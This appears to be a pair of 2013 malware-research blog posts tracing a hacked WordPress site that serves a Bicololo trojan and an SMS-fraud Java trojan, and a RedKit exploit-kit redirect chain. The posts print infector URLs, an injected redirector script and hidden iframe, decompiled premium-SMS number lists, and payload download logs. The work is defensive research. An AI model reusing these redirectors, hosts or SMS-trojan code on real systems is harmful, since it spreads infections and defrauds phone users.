Wordpress is a very useful blog sites, it has many useful features in its themes & plugins, a world wide popularity and yet also famous of its tons of vulnerabilities in the supported plugins and themes. This story is about a Wordpress site that got hacked and being used to serve malware infections, not only to the PC that accessed it, but also infection malware for the mobile devices too.
Here we go!
Recognizing the infection pattern reported in UrlQuery below:
http://urlquery.net/report.php?id=678590
Bumped us to a large amount (hundreds) of malware infector URLs:
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=YQfpcUvsYV
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xvGoLsqGhV
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=xxuMdywDDk
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=VMmujweIUQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=uxsBosuiCw
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=TxtyywoBdy
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=UImqwXIMoh
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=tEeWvHTtYn
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=RfkOKspdvC
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=qwBQIWUwOM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pPNhxcgVJk
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pIYmBHGgee
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=pBhEkPUQqf
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=OHRLfRUvGK
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=nvDLJcwTuQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=msvIMqjIdB
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=Luncwlsxkw
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LvGpxhVGuS
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lVlRWCfJvd
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=lLcsskMdbK
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LprlKrYScJ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=kqbeUHWYWb
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KqqjBhNpeM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=LFGtIvwBnQ
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KpOuJWkLhY
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=KfObcIdoVm
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=IkxUNXUHeP
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HYxgeMlwsp
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=hlwfpHMCMM
inbuildhouse.ru/wp-content/themes/stroy/akismeet.php?ncrnd=HcOGfViMqN
:
:
It is the vulnerable Wordpress with Theme "Stroy/Red Stroy" injected - with malware download URL in random made script at fake "akismeet.php" script. I think the theme was made in Russia.

The PC Threat

Shortly, we fetched the sample:
Resolving inbuildhouse.ru... seconds 0.00, 178.236.176.74
Caching inbuildhouse.ru => 178.236.176.74
Connecting to inbuildhouse.ru|178.236.176.74|:80... seconds 0.00, connected.
:
GET /wp-content/themes/stroy/akismeet.php?ncrnd=hQwgNcBXro HTTP/1.0
Accept: */*
Host: inbuildhouse.ru
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 302 Found
Server: nginx/1.1.5
Date: Fri, 11 Jan 2013 11:46:02 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA
:
302 Found
Location: h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA [following]
Skipping 0 bytes of body: [] done.
--20:46:10-- h00p://inbuildhouse.ru/wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA
=> `update.php@q=PHOTO-DEVOCHKA'
Reusing existing connection to inbuildhouse.ru:80.
:
GET /wp-content/themes/stroy/update.php?q=PHOTO-DEVOCHKA HTTP/1.0
Accept: */*
Host: inbuildhouse.ru
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.1.5
Date: Fri, 11 Jan 2013 11:46:03 GMT
Content-Type: application/octet-stream
Content-Length: 184243
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Accept-Ranges: bytes
Content-disposition: attachment; filename="PHOTO-DEVOCHKA.exe"
:
200 OK
Length: 184,243 (180K) [application/octet-stream]
20:46:13 (78.58 KB/s) - `PHOTO-DEVOCHKA.exe' saved [184243/184243]
We got the sample which turned out to be a Trojan VBS Win32/Bicololo. Below is the Virus Total scan result:
SHA1: f05b0a6734391f19838bdcb41d29d173a1d45b02 MD5: f54715875c3327953965072927e86bd0 File size: 179.9 KB ( 184243 bytes ) File name: GOLAYA-BABE.exe File type: Win32 EXE Tags: peexe bobsoft Detection ratio: 11 / 44 Analysis date: 2013-01-11 12:51:39 UTC ( 5 minutes ago ) URL --->>[VirusTotal]Malware Names:GData : VBS:Bicololo-BG TrendMicro-HouseCall : TROJ_GEN.F47V0111 Avast : VBS:Bicololo-BG [Trj] Kaspersky : UDS:DangerousObject.Multi.Generic Jiangmin : Trojan/StartPage.bim Malwarebytes : Trojan.StartPage.ooo Panda : Trj/Qhost.MR Ikarus : Trojan.Win32.Qhosts Kingsoft : Win32.Troj.Undef.(kcloud) TheHacker : Trojan/Bicololo.a Microsoft : Trojan:Win32/QHosts.BF
Virus Total & (ESET) made a good description and analysis about this trojan. Our analysis result-->>[HERE] (matched to the ESET Bicololo Trojan description). Below is the network traffic we captured (click to enlarge)

The Mobile Threat

The story is not ending yet, the hacked site was filled with other infectors. we accidentally found this link:
inbuildhouse.ru/wp-content/themes/stroy/
Then we followed it...
=> `inbuildhouse.ru/wp-content/themes/stroy/index.html'
Resolving inbuildhouse.ru... 178.236.176.74
Connecting to inbuildhouse.ru|178.236.176.74|:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: h00p://mampoks.ru [following]
--20:59:13-- h00p://mampoks.ru/
=> `mampoks.ru/index.html'
Resolving mampoks.ru... 195.128.18.244
Connecting to mampoks.ru|195.128.18.244|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 369 [text/html]
20:59:13 (11.45 MB/s) - `mampoks.ru/index.html' saved [369/369]
to be forwarded to OTHER (mampoks.ru) infector. And download the index.html of that infector instead, which containing - a redirector script to ANOTHER HOST's landing page at ktozdesj.ru↓
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=h00p://ktozdesj.ru/l.php?l=o&r=9578&a=32">
Your browser will download:
Resolving ktozdesj.ru... seconds 0.00, 93.170.107.130
Caching ktozdesj.ru => 93.170.107.130
Connecting to ktozdesj.ru|93.170.107.130|:80... seconds 0.00, connected.
GET /l.php?l=o&r=9578&a=32 HTTP/1.0
Referer: h00p://inbuildhouse.ru/wp-content/themes/stroy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: ktozdesj.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx admin
Date: Fri, 11 Jan 2013 12:01:13 GMT
Content-Type: text/html
Content-Length: 5307
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=cbd9f50b900881ae84c2ecfa6cb65889; expires=Fri,
11-Jan-2013 13:01:13 GMT; path=/; domain=.localhost
200 OK
Length: 5,307 (5.2K) [text/html]
21:01:21 (105.95 MB/s) - `l.php' saved [5307/5307]
Which having malicious link below:
ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32
PoC:
$ grep "getfile" 1.php

l.php(24): <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32"><img src="landings/images/opera/images/mobile-logo.png" alt="ミ榧アミスミセミイミサミオミスミクミオ Opera Mini"></a>
l.php(35): <a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="tab-link">
l.php(66): <form action="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" method="post" class="close">
l.php(80): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">ミ。ミ墟籍ァミ籍「ミャ ミイミオム€ム・クム・7.0</a></p>
l.php(84): <a class="art-opn" href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" title="ミ榧アミスミセミイミク ム・イミセム・Opera!" target="_blank">
l.php(139): <p id="add-source"><a href="h00p..ktozdesj.ru/getfile.php?dtype=browser&r=9578-1&a=32" class="button">ミ。ミ墟籍ァミ籍「ミャ ミイミオム€ム・クム・7.0</a></p>
If your browser is mobile/Android you will be redirected to these url↑ And what's this lead us to?
HTTP/1.1 200 OK
Server: nginx admin
Date: Fri, 11 Jan 2013 12:14:09 GMT
Content-Type: application/java-archive
Content-Length: 251481
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=4db23831b11474b4f734f1ae64594967; expires=Fri, 11-Jan-2013 13:14:09 GMT; path=/; domain=.localhost
Content-Disposition: attachment; filename="browser_update_install.jar"
Yes, another jar payload "browser_update_install.jar".
File Info:
browser_update_install.jar 2013/01/11 21:16 251,481 45078333eb39116c154899d3bf5501e8
We analized the code to find malicious SMS sending functions-->>[HERE]Yes, it sends SMS for the international used to specific numbers, with supporting international code to call: Some number to reach...
public final class k
{ private static String[] a = { "79202909090", "79206909090", "79219909090", "79222909090", "79232909090", "79242000690", "79262909090", "79272909090", "79282000002", "79289900028", "89282000002" };
private static String[] b = { "79168999100", "79168960220", "79116009993", "79114009993", "73434800248", "79147991000", "79147991000", "79106609999", "79135330003", "79168999800", "79139869990", "79107459999", "79171002003", "79171002003", "79112009993", "70957699100", "70957699101", "70957699102", "70957699800", "79027899999", "79029889991", "79104999104", "79107899999", "79126313456", "79128800003", "79128900003", "79129200003", "79168999101", "79168999102" };
private static String[] c = { "7922", "7929", "7932" };
:
:
static
{{ "79037011111", "73339077000", "77059077000", "790173100", "79033619502" }[5] = "79037011110";
{ "7901630", "7901631", "7901632", "7901633", "79016340", "79016341", "79016342", "79016343", "79016344", "7901640", "7901641", "790165", "790166", "7901670", "7901671", "7901672", "7901673", "7901674", "790217", "7902510", "7902511", "7902512", "7902513", "7902514", "7902515", "7902516", "7902519", "790254", "7902560", "7902561", "7902566", "7902567", "7902568", "7902569", "7902576", "7902577", "7902578", "7902579", "790276", "790411", "790412", "790413", "790414", "790415", "790864", "790865", "790866", "795005", "795006", "795007", "795008", "795009", "795010", "795011", "795012", "795013", "795014", "795261", "795262" }[59] = "795263";
d = new String[] { "7701", "7702", "7775", "7778", "73009300300", "73009300301" };
e = new String[] { "7908228", "7908229", "795297", "795298", "790219", "7902285", "7902286", "7902504", "7902507", "795025", "7950660", "7950661", "7950962", "7950963", "795225", "795230", "795326", "795393", "790408", "790409", "790453", "790878", "795071", "795113", "795114", "795115", "795176", "795242", "795243", "7900355", "7900356", "7900357", "7900358", "7900359", "790036", "7900370", "7900371", "7900372", "7900373", "7900374", "795069", "795296", "795327", "795328", "795329", "7902147", "7902148", "7902149", "7902283", "7902284", "7908225", "7908226", "7908291", "7908292", "7908293", "7908294", "7908295", "795068", "795172", "795248", "795390", "79004735", "79004736", "79004737", "79004738", "79004739", "7900474", "7900475", "7900476", "7900477", "7900478", "7900479", "7900480", "7900481", "7900482", "79004830", "79004831", "79004832", "79004833", "79004834", "790403", "790425", "7904260", "7904261", "790459", "790465", "7904857", "7904858", "7904859", "7904955", "7904956", "7904957", "7904958", "7904959", "795173", "795174", "795350", "795351", "7953520", "7953521", "7953522", "7953523", "7953524", "7900300", "7900301", "7900302", "7900303", "7900304", "7900305", "7900306", "7900307", "7900308", "7900309", "7904210", "7904211", "7904212", "7904213", "7904214", "790813", "790814", "795075", "795076", "795077", "795154", "795155", "795156", "795185", "795186", "795187", "795210", "795254", "795255", "7904245", "7904246", "7904247", "7904248", "7904249", "7904275", "7904276", "7904277", "7904278", "7904279", "790431", "790483", "795015", "795016", "795017", "795081", "795082", "795083", "795119", "795120", "795121", "795240", "795241", "79534115", "79534116", "79534117", "79534118", "79534119", "7900345", "7900346", "7900347", "7900348", "7900349", "7900350", "7900351", "7900352", "7900353", "7900354", "7902250", "7902251", "7902252", "7908290", "795067", "795205", "795211", "795279", "795331", "795332", "795333", "795346", "790437", "790457", "790496", "790499", "790894", "790895", "795026", "795027", "795057", "795058", "795059", "795116", "795117", "795118", "795157", "795158", "795159", "795160", "795161", "7952165", "7952166", "7952167", "7952168", "7952169", "7952170", "7952171", "7952172", "7952173", "7952174", "7953059", "7953060", "7953061", "7953062", "7953063", "7953064", "7953065", "7953066", "7953067", "7953068", "790052", "7951347", "7951348", "7951349", "7951350", "7951351", "7951352", "7951353", "7951354", "7951355", "7951356", "795313", "795367", "795368", "795369", "795394", "795024", "795364", "795365", "795366", "7900229", "790023", "790024", "790025", "790026", "790027", "790028", "7900290", "7900291", "7900292", "7900293", "7900294", "7900295", "7900296", "7900297", "7900298", "7902403", "7902404", "7902405", "7902406", "7902407", "7902408", "790867", "790868", "7908690", "7908691", "7908692", "7908693", "795281", "795282", "795283", "795284", "795285", "795286", "795287", "7953069", "795307", "795308", "795309", "795310", "7953110", "7953111", "7953112", "7953113", "7953114", "7953115", "7953116", "7953117", "7953118", "79534110", "79534111", "79534112", "79534113", "79534114", "790452", "790812", "795087", "795107", "795108", "795131", "795132", "795133", "795249", "7904218", "7904219", "790428", "790429", "790468", "790469", "795080", "795130", "795259", "790213", "7902281", "7902282", "7908605", "7908606", "7908607", "795089", "7951295", "7951296", "7951297", "795229", "795330", "795375", "7952314", "790404", "790405", "790406", "790439", "790815", "790816", "790823", "795060", "795061", "795062", "795244", "795245", "795276", "795277", "795278", "795355", "795356", "795357", "795136", "795137", "795138", "795139", "795290", "795291", "795292", "795293", "795294", "795376", "795377", "795378", "795379", "795380", "7953857", "7953858", "7953859", "795386", "795387", "795388", "7953890", "7953891", "7953892", "7953893", "7953894", "7953895", "7953896", "790407", "790432", "790458", "790482", "790810", "790811", "790831", "790879", "790880", "795021", "795033", "795078", "795079", "795095", "795140", "795141", "795142", "795339", "795347", "795361", "795362", "795381", "7900455", "7900456", "7900457", "7900458", "7900459", "7900460", "7900461", "7900462", "7900463", "7900464", "7953525", "7953526", "7953527", "7953528", "7953529", "795353", "795354", "795175", "795323", "795324", "7953250", "7953251", "7953252", "7953253", "7953254", "790434", "790444", "790450", "790817", "790818", "790819", "790850", "790851", "795084", "795085", "795086", "795149", "795150", "795151", "795152", "795153", "795182", "795183", "795184", "795256", "795257", "795258", "795260", "795110", "795212", "795373", "795374", "790433", "790451", "790455", "790460", "790461", "790463", "790464", "795000", "795001", "795002", "795003", "795004", "795022", "795164", "795165", "795166", "795167", "795168", "795220", "795221", "795222", "795223", "795224", "795226", "795227", "795228", "795235", "795236", "795237", "795238", "795239", "795314", "795315", "795316", "795317", "795334", "795335", "795336", "795337", "7900219", "7900220", "7900221", "7900222", "7900223", "7900224", "7900225", "7900226", "7900227", "7900228", "790436", "790828", "795070", "795169", "795170", "795171", "795253", "795299", "790410", "790420", "790422", "790423", "7904270", "7904271", "7904272", "7904273", "7904274", "790486", "7908328", "7908329", "7908715", "7908716", "7908717", "7908718", "7908719", "7950308", "7950565", "7950566", "7950567", "7950568", "7950569", "795312", "795370", "795371", "795372", "79004715", "79004716", "79004717", "79004718", "79004719", "7900472", "79004730", "79004731", "79004732", "79004733", "79004734", "790400", "790401", "790402", "790435", "795206", "795215", "7952160", "7952161", "7952162", "7952163", "7952164", "7952175", "7952176", "7952177", "7952178", "7952179", "7952180", "7952181", "7952182", "7952183", "7952184", "795280", "795288", "795289", "795391", "795392", "795090", "795091", "795092", "7952015", "7952016", "7952017", "7952018", "7952019", "7952185", "7952186", "7952187", "7952188", "7952189", "795318", "795319", "7953419", "795342", "795343", "7953440", "7953441", "7953442", "7953443", "795395", "795396", "7953970", "7953971", "7953972", "7953973", "7953974", "790430", "790497", "790804", "790805", "790806", "790857", "790858", "795072", "795073", "795074", "795111", "795112", "795144", "795145", "795146", "795147", "795148", "795177", "795178", "795179", "795180", "795181", "795250", "795251", "795252" };
{ "38050", "38095", "38066" }[3] = "38099";
{ "790208", "7902200", "7902203", "7902204", "7902205", "7902206", "7902207", "7902208", "7902209", "790234", "7902352", "7902353", "7902354", "79047299", "790852", "790853" }[16] = "795023";
f = new String[] { "7705", "7777", "7771" }; }}
Some country code...
jdField_a_of_type_JavaUtilHashtable.put("7840", "ab");
jdField_a_of_type_JavaUtilHashtable.put("7940", "ab");
jdField_b_of_type_JavaUtilHashtable.put("994", "az");
jdField_b_of_type_JavaUtilHashtable.put("213", "alzhir");
jdField_b_of_type_JavaUtilHashtable.put("374", "am");
jdField_b_of_type_JavaUtilHashtable.put("375", "by");
jdField_b_of_type_JavaUtilHashtable.put("359", "bolgaria");
jdField_b_of_type_JavaUtilHashtable.put("387", "bosniaigerc");
jdField_b_of_type_JavaUtilHashtable.put("502", "gvatemala");
jdField_b_of_type_JavaUtilHashtable.put("504", "gonduras");
jdField_b_of_type_JavaUtilHashtable.put("852", "gonkong");
jdField_b_of_type_JavaUtilHashtable.put("972", "israel");
jdField_b_of_type_JavaUtilHashtable.put("962", "iordania");
jdField_b_of_type_JavaUtilHashtable.put("855", "kambodzha");
Virus Total checks shows:
MD5: 45078333eb39116c154899d3bf5501e8 File size: 245.6 KB ( 251481 bytes ) File name: browser_update_install.jar File type: JAR Tags: jar Detection ratio: 31 / 46 Analysis date: 2013-01-11 12:17:18 UTC ( 1 hour, 58 minutes ago ) URL --->>[VirusTotal]Malware Names:MicroWorld-eScan : Trojan.Java.Smssend.W nProtect : Trojan.Java.Smssend.W CAT-QuickHeal : Trojan.JavaExploit McAfee : Generic.dx!bfzk K7AntiVirus : Trojan F-Prot : Java/SMSer.L Symantec : Trojan.Gen.2 Norman : SMSSend.CX TotalDefense : Java/SMSTroj.Q TrendMicro-HouseCall : TROJ_GEN.FCBHZIK Avast : Java:SMSSend-GF [Expl] ClamAV : Android.Trojan.Smssend-7 Kaspersky : Trojan-SMS.J2ME.Jifake.my BitDefender : Trojan.Java.Smssend.W NANO-Antivirus : Trojan.SmsSend.wgugf Sophos : Troj/Jifake-A Comodo : UnclassifiedMalware F-Secure : Trojan.Java.Smssend.W DrWeb : Java.SMSSend.780 AntiVir : JAVA/Badorg.BA TrendMicro : JAVA_SMSAGE.NT Emsisoft : Trojan.Java.Smssend.W (B) Jiangmin : Trojan/AndroidOS.afcr Microsoft : Trojan:Java/SMSer.AY ViRobot : J2ME.A.Jifake.2840 GData : Trojan.Java.Smssend.W Commtouch : Java/SMSer.L ESET-NOD32 : a variant of J2ME/TrojanSMS.Agent.DH Ikarus : JAVA.SMSSend Fortinet : Java/SMSBoxer.AQ!tr AVG : Java/SMS.OO

Research Materials

To the fellow researchers & AV industry, samples & analysis data is-->>[HERE]
#MalwareMustDie

Once upon a time with another Red Kit infection & its Payload

$
0
0
I was eager to see another Exploit Kit infection in action in this Crusade, some efforts was made but I was bumped into some other non-EK infectors in here and there before finally finding the below infector url. I was really hoping this is a Cool Exploit Kit but ending up to be RedKit pack.
supportservice060.ru/flow2.php
(Thank's to @MalwareSigs tips) that's how the adventure began, and went to the landing page below:

*) As reference here's our previous Red Kit analysis-->>[HERE]
OK. Here's the story:

First of all the route of this case's infection scheme is as follows:
Infector Page (flow2.php)
91.243.115.140 supportservice078.ru

Infector "Ticket" confirmator (/vd/5;b068d006acd6b9e6e371e501d35be2a7)
46.166.169.238 gzqxj.portrelay.com

TDS Redirector page (/tds/in.cgi?9 )
91.243.115.140 supportservice078.ru

RedKit Redirector & Landing pages (hiqy.html)
81.169.145.163 schloss-beratung.de // 302 to other landing page
74.53.109.128 windermerecottage.co.uk // the landing page + payload

*) PS: Better watch IPs, domains & DNS used by these↑ infector scheme!

It is not like the blackhole, Red Kit use a good confirmation scheme and -
a TDS redirector for each access arrived. Infector page, ticket confirmator -
and TDS are a set of barricade. Behind those, the Red Kit hosts looks can be -
setup to forward infection one to another host by round-robin scheme via -
HTTP flag 302. Let's see the following log detail carefully as PoC.

We access the infector url:
--02:24:22--  h00p://supportservice060.ru/flow2.php
Resolving supportservice060.ru... seconds 0.00, 91.243.115.140
Caching supportservice060.ru => 91.243.115.140
Connecting to supportservice060.ru|91.243.115.140|:80... seconds 0.00, connected.
:
GET /flow2.php HTTP/1.0
Accept: */*
Host: supportservice060.ru
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 13:27:04 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 91
Connection: close
Content-Type: text/html; charset=UTF-8
:
200 OK
Length: 91 [text/html]
02:24:25 (1.55 MB/s) - `flow2.php' saved [91/91]
The inside contains:
<iframe src="h00p://supportservice078.ru/tds/in.cgi?default" height="3" width="3">
So we fetched it further, turns out to be a long way to go.. before get he downloads..
--02:27:23--  h00p://supportservice078.ru/tds/in.cgi?default
Resolving supportservice078.ru... seconds 0.00, 91.243.115.140
Caching supportservice078.ru => 91.243.115.140
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
:
GET /tds/in.cgi?default HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
Host: supportservice078.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
:
HTTP/1.1 302 Found
Date: Fri, 11 Jan 2013 13:30:02 GMT
Server: Apache/2.2.15 (CentOS)
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
:
302 Found
Location: h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7 [following]

--02:27:24-- h00p://gzqxj.portrelay.com/vd/5;b068d006acd6b9e6e371e501d35be2a7
=> `5'
Resolving gzqxj.portrelay.com... seconds 0.00, 46.166.169.238
Caching gzqxj.portrelay.com => 46.166.169.238
Connecting to gzqxj.portrelay.com|46.166.169.238|:80... seconds 0.00, connected.
:
GET /vd/5;b068d006acd6b9e6e371e501d35be2a7 HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: gzqxj.portrelay.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
:
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 11 Jan 2013 19:29:36 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.20
Location: h00p://supportservice078.ru/tds/in.cgi?9
Vary: Accept-Encoding,User-Agent
:
302 Found
Location: h00p://supportservice078.ru/tds/in.cgi?9 [following]
Skipping 0 bytes of body: [] done.
--02:27:25-- h00p://supportservice078.ru/tds/in.cgi?9
=> `in.cgi@9'
conaddr is: 46.166.169.238
Found supportservice078.ru in host_name_addresses_map (003D52C8)
Connecting to supportservice078.ru|91.243.115.140|:80... seconds 0.00, connected.
:
GET /tds/in.cgi?9 HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: supportservice078.ru
Connection: Keep-Alive
Cookie: TSUSER=vdelecc; vbpnx10=_1_; vbpnxdefault=_10_; vbpnxvdelecc=_1_
:
HTTP request sent, awaiting response...
:
HTTP/1.1 302 Found
Date: Fri, 11 Jan 2013 13:30:03 GMT
Server: Apache/2.2.15 (CentOS)
Location: h00p://schloss-beratung.de/hiqy.html
:
302 Found
Location: h00p://schloss-beratung.de/hiqy.html [following]
:
--02:27:25-- h00p://schloss-beratung.de/hiqy.html
=> `hiqy.html'
conaddr is: 46.166.169.238
Resolving schloss-beratung.de... seconds 0.00, 81.169.145.163
Caching schloss-beratung.de => 81.169.145.163
Found schloss-beratung.de in host_name_addresses_map (003D6640)
Connecting to schloss-beratung.de|81.169.145.163|:80... seconds 0.00, connected.
:
GET /hiqy.html HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: schloss-beratung.de
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 302 Moved Temporarily
Date: Fri, 11 Jan 2013 17:27:18 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8r
X-Powered-By: PHP/5.2.17
Set-Cookie: d3e4aec0be51dc536dfa324cc2df3903=1927452e1f33f00606657af59fa38408; expires=Fri, 18-Jan-2013 17:27:18 GMT; path=/
Location: h00p://windermerecottage.co.uk/hiqy.htm
Connection: close
Content-Type: text/html
:
302 Moved Temporarily
Location: h00p://windermerecottage.co.uk/hiqy.htm [following]

--02:27:26-- h00p://windermerecottage.co.uk/hiqy.htm
=> `hiqy.htm'
conaddr is: 46.166.169.238
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Found windermerecottage.co.uk in host_name_addresses_map (003D6B10)
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
:
GET /hiqy.htm HTTP/1.0
Referer: h00p://supportservice060.ru/flow2.php
User-Agent: MalwareMustDie is Sleepy
Accept: */*
Host: windermerecottage.co.uk
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:27:18 GMT
Server: Apache
Content-Length: 13283
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
:
200 OK
Length: 13,283 (13K) [text/html]
02:27:27 (2.93 MB/s) - `hiqy.htm' saved [13283/13283]
This hiqy.htm is a landing page script, with 2 jars + 1 pdf infector. To get into hiqy.htm, we must 1st get through the gate at↓
supportservice078.ru/tds/in.cgi?9
↑which its script & our used access parameter will be the keys to which infector - we will be forwarded. The landing page source:You'll see neutralized landing page code here -->>[PASTEBIN]For analysis I breakdown the code in here -->>[PASTEBIN] The landing page has the jars download urls below:
windermerecottage.co.uk/332.jar
windermerecottage.co.uk/887.jar
but I can't grab them, bumped with 404. Log:
GET /332.jar HTTP/1.0
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
HTTP/1.1 404 Not Found
Date: Fri, 11 Jan 2013 17:45:57 GMT
There's a RedKit reference ->>[HERE] explained the way to fetch jars - by the direct link to the 33.html and 41.html via jars to download, but this - wasn't work well & returning a zero byte file, I guess the params are unmatched, PoC:
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /62.html HTTP/1.0
Referer: h00p://windermerecottage.co.uk/hiqy.htm
User-Agent: MalwareMustDie
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sat, 12 Jan 2013 08:34:35 GMT
Server: Apache
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
200 OK
Length: 0 [text/html]
17:34:44 (0.00 B/s) - `62.html' saved [0/0]
BUT! There's also a PDF url which I just downloaded it right away :-)
--02:47:09--  h00p://windermerecottage.co.uk/987.pdf
Resolving windermerecottage.co.uk... seconds 0.00, 74.53.109.128
Caching windermerecottage.co.uk => 74.53.109.128
Connecting to windermerecottage.co.uk|74.53.109.128|:80... seconds 0.00, connected.
GET /987.pdf HTTP/1.0
Referer: h00p://windermerecottage.co.uk/hiqy.htm
User-Agent: MalwareMustDie is Sleepy
Host: windermerecottage.co.uk
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 11 Jan 2013 17:47:01 GMT
Server: Apache
Content-Disposition: inline; filename=5c6bcd22.pdf
Content-Length: 6418
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/pdf
200 OK
